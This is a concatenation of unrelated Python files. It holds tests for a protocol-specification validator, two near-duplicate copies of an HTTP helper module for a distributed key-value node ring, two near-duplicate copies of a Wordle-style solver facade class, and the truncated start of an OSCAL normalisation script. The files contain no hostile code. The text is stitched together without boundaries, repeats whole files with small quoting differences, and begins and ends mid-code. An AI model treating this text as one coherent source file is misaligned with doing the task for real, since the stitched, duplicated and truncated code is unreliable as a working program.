invalid_termination_2 = ["perm_5"] invalid_terminal_performatives_from_reply_2 = {"perm_5"} invalid_result_2, invalid_msg_2 = _validate_termination( invalid_termination_2, valid_performatives_set, invalid_terminal_performatives_from_reply_2, ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_termination_3 = {"perm_5"} invalid_terminal_performatives_from_reply_3 = {"perm_5"} invalid_result_3, invalid_msg_3 = _validate_termination( invalid_termination_3, valid_performatives_set, invalid_terminal_performatives_from_reply_3, ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for termination. Expected list. Found '{type(invalid_termination_3)}'." ) invalid_termination_4 = ["perm_4", "perm_3", "perm_4", "perm_3", "perm_1"] invalid_terminal_performatives_from_reply_4 = {"perm_4", "perm_3", "perm_1"} invalid_result_4, invalid_msg_4 = _validate_termination( invalid_termination_4, valid_performatives_set, invalid_terminal_performatives_from_reply_4, ) assert invalid_result_4 is False assert ( invalid_msg_4 == f'There are {2} duplicate performatives in "termination".' ) invalid_termination_5 = ["perm_4", "perm_3"] invalid_terminal_performatives_from_reply_5 = {"perm_4"} invalid_result_5, invalid_msg_5 = _validate_termination( invalid_termination_5, valid_performatives_set, invalid_terminal_performatives_from_reply_5, ) assert invalid_result_5 is False assert ( invalid_msg_5 == 'The terminal performative \'perm_3\' specified in "termination" is assigned replies in "reply".' ) invalid_termination_6 = ["perm_4"] invalid_terminal_performatives_from_reply_6 = {"perm_4", "perm_3"} invalid_result_6, invalid_msg_6 = _validate_termination( invalid_termination_6, valid_performatives_set, invalid_terminal_performatives_from_reply_6, ) assert invalid_result_6 is False assert ( invalid_msg_6 == "The performative 'perm_3' has no replies but is not listed as a terminal performative in \"termination\"." ) def test_validate_roles(self): """Test for the '_validate_roles' method.""" valid_roles_1 = {"role_1": None, "role_2": None} valid_result_1, valid_msg_1 = _validate_roles(valid_roles_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue roles are valid." valid_roles_2 = {"role_1": None} valid_result_2, valid_msg_2 = _validate_roles(valid_roles_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue roles are valid." ################################################### invalid_roles_1 = dict() invalid_result_1, invalid_msg_1 = _validate_roles(invalid_roles_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "There must be either 1 or 2 roles defined in this dialogue. Found 0" ) invalid_roles_2 = {"role_1": None, "role_2": None, "role_3": None} invalid_result_2, invalid_msg_2 = _validate_roles(invalid_roles_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_roles_3 = {"_agent_": None} invalid_result_3, invalid_msg_3 = _validate_roles(invalid_roles_3) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for role '_agent_'. Role names must match the following regular expression: {} ".format( ROLE_REGEX_PATTERN ) ) invalid_roles_4 = {"client"} invalid_result_4, invalid_msg_4 = _validate_roles(invalid_roles_4) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for roles. Expected dict. Found '{type(invalid_roles_4)}'." ) def test_validate_end_states(self): """Test for the '_validate_end_states' method.""" valid_end_states_1 = ["end_state_1", "end_state_2"] valid_result_1, valid_msg_1 = _validate_end_states(valid_end_states_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue end_states are valid." valid_end_states_2 = [] valid_result_2, valid_msg_2 = _validate_end_states(valid_end_states_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue end_states are valid." ################################################### invalid_end_states_1 = ["_end_state_1"] invalid_result_1, invalid_msg_1 = _validate_end_states(invalid_end_states_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for end_state '_end_state_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_2 = ["end_$tate_1"] invalid_result_2, invalid_msg_2 = _validate_end_states(invalid_end_states_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_3 = {"end_state_1"} invalid_result_3, invalid_msg_3 = _validate_end_states(invalid_end_states_3) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for roles. Expected list. Found '{type(invalid_end_states_3)}'." ) def test_validate_keep_terminal(self): """Test for the '_validate_keep_terminal' method.""" valid_keep_terminal_state_dialogues_1 = True valid_result_1, valid_msg_1 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_1 ) assert valid_result_1 is True assert valid_msg_1 == "Dialogue keep_terminal_state_dialogues is valid." valid_keep_terminal_state_dialogues_2 = False valid_result_2, valid_msg_2 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_2 ) assert valid_result_2 is True assert valid_msg_2 == "Dialogue keep_terminal_state_dialogues is valid." ################################################### invalid_keep_terminal_state_dialogues_1 = "some_non_boolean_value" invalid_result_1, invalid_msg_1 = _validate_keep_terminal( invalid_keep_terminal_state_dialogues_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_keep_terminal_state_dialogues_1)}." ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_dialogue_section(self, mocked_spec): """Test for the '_validate_dialogue_section' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": ["performative_mt", "performative_o"], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } mocked_spec.dialogue_config = valid_dialogue_config_1 ( valid_result_1, valid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section of the protocol specification is valid." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1["initiation"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_1 ( invalid_result_1, invalid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Performative 'new_performative' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2["reply"] = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], } mocked_spec.dialogue_config = invalid_dialogue_config_2 ( invalid_result_2, invalid_msg_2, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_2 is False assert ( invalid_msg_2 == "No reply is provided for the following performatives: {}".format( {"performative_empty_contents"}, ) ) invalid_dialogue_config_3 = valid_dialogue_config_1.copy() invalid_dialogue_config_3["termination"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_3 ( invalid_result_3, invalid_msg_3, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == "Performative 'new_performative' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_4 = valid_dialogue_config_1.copy() invalid_dialogue_config_4["roles"] = { "role_1": None, "role_2": None, "role_3": None, } mocked_spec.dialogue_config = invalid_dialogue_config_4 ( invalid_result_4, invalid_msg_4, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_dialogue_config_5 = valid_dialogue_config_1.copy() invalid_dialogue_config_5["end_states"] = ["end_$tate_1"] mocked_spec.dialogue_config = invalid_dialogue_config_5 ( invalid_result_5, invalid_msg_5, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_dialogue_config_6 = valid_dialogue_config_1.copy() invalid_dialogue_config_6.pop("termination") mocked_spec.dialogue_config = invalid_dialogue_config_6 ( invalid_result_6, invalid_msg_6, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_6 is False assert ( invalid_msg_6 == "Missing required field 'termination' in the dialogue section of the protocol specification." ) invalid_value = 521 invalid_dialogue_config_7 = valid_dialogue_config_1.copy() invalid_dialogue_config_7["keep_terminal_state_dialogues"] = invalid_value mocked_spec.dialogue_config = invalid_dialogue_config_7 ( invalid_result_7, invalid_msg_7, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_7 is False assert ( invalid_msg_7 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_value)}." ) @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([True, "Dialogue section is correct!"]), ) def test_validate_positive( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Positive test for the 'validate' method: invalid dialogue section.""" ( valid_result_1, valid_msg_1, ) = validate(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Protocol specification is valid." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([False, "Some error on speech_acts.", None, None]), ) def test_validate_negative_invalid_speech_acts( self, mocked_spec, macked_validate_speech_acts ): """Negative test for the 'validate' method: invalid speech_acts.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on speech_acts." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([False, "Some error on protobuf snippets."]), ) def test_validate_negative_invalid_protobuf_snippets( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf ): """Negative test for the 'validate' method: invalid protobuf snippets.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on protobuf snippets." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([False, "Some error on dialogue section."]), ) def test_validate_negative_invalid_dialogue_section( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Negative test for the 'validate' method: invalid dialogue section.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on dialogue section."
import requests from time import sleep from lib.constants import * def log_request(targetNode): url = HTTP + targetNode.get_address() + '/log' return requests.get(url) def join_request(targetNode, port, ip): sleep(2) url = HTTP + targetNode.get_address() + '/join' params = f'{PORT}={port}&{IP}={ip}' requests.get(url + '?' + params) def insert_request(targetNode, key, value, propagate = True): url = HTTP + targetNode.get_address() + '/insert' params = f'{KEY}={key}&{VALUE}={value}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def insert_replica_request(targetNode, key, value, number, propagate = True): url = HTTP + targetNode.get_address() + '/insert_replica' params = f'{KEY}={key}&{VALUE}={value}&{NUMBER}={number}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def increase_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/increase_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def decrease_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/decrease_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def increase_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/increase_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def delete_request(targetNode, key): url = HTTP + targetNode.get_address() + '/delete' params = f'{KEY}={key}' requests.get(url + '?' + params) def delete_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/delete_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def query_request(targetNode, key): url = HTTP + targetNode.get_address() + '/query' params = f'{KEY}={key}' result = requests.get(url + '?' + params) return result def query_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/query_replica' params = f'{KEY}={key}&{NUMBER}={number}' result = requests.get(url + '?' + params) return result def update_next_request(targetNode, port, ip, cur_next): url = HTTP + targetNode.get_address() + '/update_next' params = f'{PORT}={port}&{IP}={ip}&{CUR_NEXT}={cur_next}' requests.get(url + '?' + params) def get_all_files_request(targetNode): url = HTTP + targetNode.get_address() + '/get_all_files' result = requests.get(url) return result def update_prev_request(targetNode, port, ip, cur_prev): url = HTTP + targetNode.get_address() + '/update_prev' params = { PORT: port, IP: ip, CUR_PREV: cur_prev, } requests.get(url, params=params) def join_successful_request(target, previous, next): url = HTTP + target.get_address() + '/join_successful' params = f'{NEXT_PORT}={next.get_port()}&{NEXT_IP}={next.get_ip()}' +\ f'&{PREV_PORT}={previous.get_port()}&{PREV_IP}={previous.get_ip()}' print(f'Requesting page {url + '?' + params}') requests.get(url + '?' + params)
import requests from time import sleep from lib.constants import * def log_request(targetNode): url = HTTP + targetNode.get_address() + '/log' return requests.get(url) def join_request(targetNode, port, ip): sleep(2) url = HTTP + targetNode.get_address() + '/join' params = f'{PORT}={port}&{IP}={ip}' requests.get(url + '?' + params) def insert_request(targetNode, key, value, propagate = True): url = HTTP + targetNode.get_address() + '/insert' params = f'{KEY}={key}&{VALUE}={value}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def insert_replica_request(targetNode, key, value, number, propagate = True): url = HTTP + targetNode.get_address() + '/insert_replica' params = f'{KEY}={key}&{VALUE}={value}&{NUMBER}={number}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def increase_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/increase_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def decrease_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/decrease_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def increase_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/increase_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def delete_request(targetNode, key): url = HTTP + targetNode.get_address() + '/delete' params = f'{KEY}={key}' requests.get(url + '?' + params) def delete_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/delete_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def query_request(targetNode, key): url = HTTP + targetNode.get_address() + '/query' params = f'{KEY}={key}' result = requests.get(url + '?' + params) return result def query_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/query_replica' params = f'{KEY}={key}&{NUMBER}={number}' result = requests.get(url + '?' + params) return result def update_next_request(targetNode, port, ip, cur_next): url = HTTP + targetNode.get_address() + '/update_next' params = f'{PORT}={port}&{IP}={ip}&{CUR_NEXT}={cur_next}' requests.get(url + '?' + params) def get_all_files_request(targetNode): url = HTTP + targetNode.get_address() + '/get_all_files' result = requests.get(url) return result def update_prev_request(targetNode, port, ip, cur_prev): url = HTTP + targetNode.get_address() + '/update_prev' params = { PORT: port, IP: ip, CUR_PREV: cur_prev, } requests.get(url, params=params) def join_successful_request(target, previous, next): url = HTTP + target.get_address() + '/join_successful' params = f'{NEXT_PORT}={next.get_port()}&{NEXT_IP}={next.get_ip()}' +\ f'&{PREV_PORT}={previous.get_port()}&{PREV_IP}={previous.get_ip()}' print(f'Requesting page {url + "?" + params}') requests.get(url + '?' + params)
from __future__ import annotations from typing import Sequence, Union from .benchmarking import Benchmark, Benchmarker, NullBenchmarkReporter, SimulBenchmarker from .boards import Scoreboard from .engine import Engine, SimulEngine from .enums import SolverType from .factory import create_models from .solver import EntropySolver from .tree import TreeBuilder from .views import NullRunReporter from .words import Word WordType = Union[str, Word] class Doddle: """ A simple, facade class for running Doddle simulations. Attributes: size (int, optional): The word length. Defaults to 5. solver_type (SolverType, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. Methods ------- __call__(answer, guess) Doddle is callable via: doddle = Doddle() scoreboard = doddle(answer=['SNAKE', 'FRUIT'], guess='APPLE') """ def __init__( self, size: int = 5, solver_type: SolverType | str = SolverType.MINIMAX, depth: int = 1, extras: Sequence[Word] | Sequence[str] | None = None, lazy_eval: bool = True, ): """Initialises a new instance of a Doddle object. Args: size (int, optional): The word length. Defaults to 5. solver_type (SolverType | str, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. """ self.size = size e = [Word(extra) for extra in extras] if extras else [] if isinstance(solver_type, str): solve_type = SolverType.from_str(solver_type) else: solve_type = solver_type dictionary, scorer, histogram_builder, solver, simul_solver = create_models( size, solver_type=solve_type, depth=depth, extras=e, lazy_eval=lazy_eval, ) callback = NullRunReporter() benchmarkReporter = NullBenchmarkReporter() self.dictionary = dictionary self.scorer = scorer self.histogram_builder = histogram_builder self.engine = Engine(dictionary, scorer, histogram_builder, solver, callback) self.simul_engine = SimulEngine(dictionary, scorer, histogram_builder, simul_solver, callback) self.benchmarker = Benchmarker(self.engine, benchmarkReporter) self.simul_benchmarker = SimulBenchmarker(self.simul_engine, benchmarkReporter) def __call__( self, answer: WordType | Sequence[WordType], guess: WordType | Sequence[WordType] | None = None ) -> Scoreboard: """Callable that runs a Doddle game and returns the resulting scoreboard. Args: answer (WordType | Sequence[WordType]): A word intended to be the answer. Alternatively, a sequence of words if you wish to play Doddle in simultaneous mode. guess (WordType | Sequence[WordType] | None, optional): An optional word to be played as the opening guess. You can pass a list of guesses if you want to play several openers. Defaults to None. Raises: ValueError: If the provided words are invalid. Returns: Scoreboard: A scoreboard showing how the game played out. """ solns = self.__to_word_list(answer, "answer") guesses = self.__to_word_list(guess, "guess") if guess else [] size = len(solns[0]) missized_solns = [s.value for s in solns if len(s) != self.size] if missized_solns: message = f"All answers must be of length {self.size}: ({", ".join(missized_solns)}). " message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={size})" raise ValueError(message) missized_guesses = [g.value for g in guesses if len(g) != self.size] if missized_guesses: message = f'All guesses must be of size {self.size}: ({', '.join(missized_guesses)}). ' message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={len(missized_guesses[0])})" raise ValueError(message) score_matrix = self.engine.histogram_builder.score_matrix unknown_solns = [s.value for s in solns if s not in score_matrix.potential_solns] if unknown_solns: missing = ", ".join(unknown_solns) missing_extras = "', '".join(unknown_solns) message = f"The following answers are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. doddle = Doddle(size={size}, ..., extras=['{answer}'])" raise ValueError(message) unknown_words = [g.value for g in guesses if g not in score_matrix.all_words] if unknown_words: missing = ", ".join(unknown_words) missing_extras = "', '".join(unknown_words) message = f"The following guesses are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. doddle = Doddle(size={size}, ..., extras=['{missing_extras}'])" raise ValueError(message) if len(solns) == 1: game = self.engine.run(solns[0], guesses) return game.scoreboard simul_game = self.simul_engine.run(solns, guesses) return simul_game.scoreboard def benchmark(self, guess: WordType | Sequence[WordType] | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.benchmarker.run_benchmark(guesses) return benchmark def simul_benchmark( self, num_simul: int, num_rounds: int = 1000, guess: WordType | Sequence[WordType] | None = None ) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.simul_benchmarker.run_benchmark(guesses, num_simul, num_rounds) return benchmark def tree_search(self, guess: WordType | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() opening_guess = Word(guess) if guess else Word("SALET") common_words = self.dictionary.common_words solver = EntropySolver(self.histogram_builder) tree_builder = TreeBuilder(self.dictionary, self.scorer, self.histogram_builder, solver) root_node = tree_builder.build(common_words, opening_guess) comma_separated_values = root_node.csv(False) return Benchmark.from_csv(comma_separated_values, False) @staticmethod def __to_word_list(words: WordType | Sequence[WordType] | None, label: str) -> list[Word]: if words is None: raise TypeError(f"The {label} cannot be None.") if isinstance(words, Word) or isinstance(words, str): soln = Word(words) return [soln] return [Word(g) for g in words]
from __future__ import annotations from typing import Sequence, Union from .benchmarking import Benchmark, Benchmarker, NullBenchmarkReporter, SimulBenchmarker from .boards import Scoreboard from .engine import Engine, SimulEngine from .enums import SolverType from .factory import create_models from .solver import EntropySolver from .tree import TreeBuilder from .views import NullRunReporter from .words import Word WordType = Union[str, Word] class Doddle: """ A simple, facade class for running Doddle simulations. Attributes: size (int, optional): The word length. Defaults to 5. solver_type (SolverType, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. Methods ------- __call__(answer, guess) Doddle is callable via: doddle = Doddle() scoreboard = doddle(answer=['SNAKE', 'FRUIT'], guess='APPLE') """ def __init__( self, size: int = 5, solver_type: SolverType | str = SolverType.MINIMAX, depth: int = 1, extras: Sequence[Word] | Sequence[str] | None = None, lazy_eval: bool = True, ): """Initialises a new instance of a Doddle object. Args: size (int, optional): The word length. Defaults to 5. solver_type (SolverType | str, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. """ self.size = size e = [Word(extra) for extra in extras] if extras else [] if isinstance(solver_type, str): solve_type = SolverType.from_str(solver_type) else: solve_type = solver_type dictionary, scorer, histogram_builder, solver, simul_solver = create_models( size, solver_type=solve_type, depth=depth, extras=e, lazy_eval=lazy_eval, ) callback = NullRunReporter() benchmarkReporter = NullBenchmarkReporter() self.dictionary = dictionary self.scorer = scorer self.histogram_builder = histogram_builder self.engine = Engine(dictionary, scorer, histogram_builder, solver, callback) self.simul_engine = SimulEngine(dictionary, scorer, histogram_builder, simul_solver, callback) self.benchmarker = Benchmarker(self.engine, benchmarkReporter) self.simul_benchmarker = SimulBenchmarker(self.simul_engine, benchmarkReporter) def __call__( self, answer: WordType | Sequence[WordType], guess: WordType | Sequence[WordType] | None = None ) -> Scoreboard: """Callable that runs a Doddle game and returns the resulting scoreboard. Args: answer (WordType | Sequence[WordType]): A word intended to be the answer. Alternatively, a sequence of words if you wish to play Doddle in simultaneous mode. guess (WordType | Sequence[WordType] | None, optional): An optional word to be played as the opening guess. You can pass a list of guesses if you want to play several openers. Defaults to None. Raises: ValueError: If the provided words are invalid. Returns: Scoreboard: A scoreboard showing how the game played out. """ solns = self.__to_word_list(answer, "answer") guesses = self.__to_word_list(guess, "guess") if guess else [] size = len(solns[0]) missized_solns = [s.value for s in solns if len(s) != self.size] if missized_solns: message = f"All answers must be of length {self.size}: ({', '.join(missized_solns)}). " message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={size})" raise ValueError(message) missized_guesses = [g.value for g in guesses if len(g) != self.size] if missized_guesses: message = f'All guesses must be of size {self.size}: ({", ".join(missized_guesses)}). ' message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={len(missized_guesses[0])})" raise ValueError(message) score_matrix = self.engine.histogram_builder.score_matrix unknown_solns = [s.value for s in solns if s not in score_matrix.potential_solns] if unknown_solns: missing = ", ".join(unknown_solns) missing_extras = "', '".join(unknown_solns) message = f"The following answers are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. doddle = Doddle(size={size}, ..., extras=['{answer}'])" raise ValueError(message) unknown_words = [g.value for g in guesses if g not in score_matrix.all_words] if unknown_words: missing = ", ".join(unknown_words) missing_extras = "', '".join(unknown_words) message = f"The following guesses are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. doddle = Doddle(size={size}, ..., extras=['{missing_extras}'])" raise ValueError(message) if len(solns) == 1: game = self.engine.run(solns[0], guesses) return game.scoreboard simul_game = self.simul_engine.run(solns, guesses) return simul_game.scoreboard def benchmark(self, guess: WordType | Sequence[WordType] | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.benchmarker.run_benchmark(guesses) return benchmark def simul_benchmark( self, num_simul: int, num_rounds: int = 1000, guess: WordType | Sequence[WordType] | None = None ) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.simul_benchmarker.run_benchmark(guesses, num_simul, num_rounds) return benchmark def tree_search(self, guess: WordType | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() opening_guess = Word(guess) if guess else Word("SALET") common_words = self.dictionary.common_words solver = EntropySolver(self.histogram_builder) tree_builder = TreeBuilder(self.dictionary, self.scorer, self.histogram_builder, solver) root_node = tree_builder.build(common_words, opening_guess) comma_separated_values = root_node.csv(False) return Benchmark.from_csv(comma_separated_values, False) @staticmethod def __to_word_list(words: WordType | Sequence[WordType] | None, label: str) -> list[Word]: if words is None: raise TypeError(f"The {label} cannot be None.") if isinstance(words, Word) or isinstance(words, str): soln = Word(words) return [soln] return [Word(g) for g in words]
# -*- mode:python; coding:utf-8 -*- # Copyright (c) 2020 IBM Corp. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Script to normalize oscal after significant changes with version 1.0.0. It then reorders the classes so there are minimal forwards required. This script is normally called by gen_oscal.py when models are generated. """ import logging import pathlib import re from trestle.oscal import OSCAL_VERSION_REGEX logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logger.addHandler(logging.StreamHandler()) class_header = 'class ' # List of filestems not including 'complete' or 'common' # 'common' is generated by this script. 'complete.py' comes from NIST and is ignored fstems = ['assessment_plan', 'assessment_results', 'catalog', 'component', 'poam', 'profile', 'ssp'] alias_map = { 'assessment_plan': 'assessment-plan', 'assessment_results': 'assessment-results', 'catalog': 'catalog', 'component': 'component-definition', 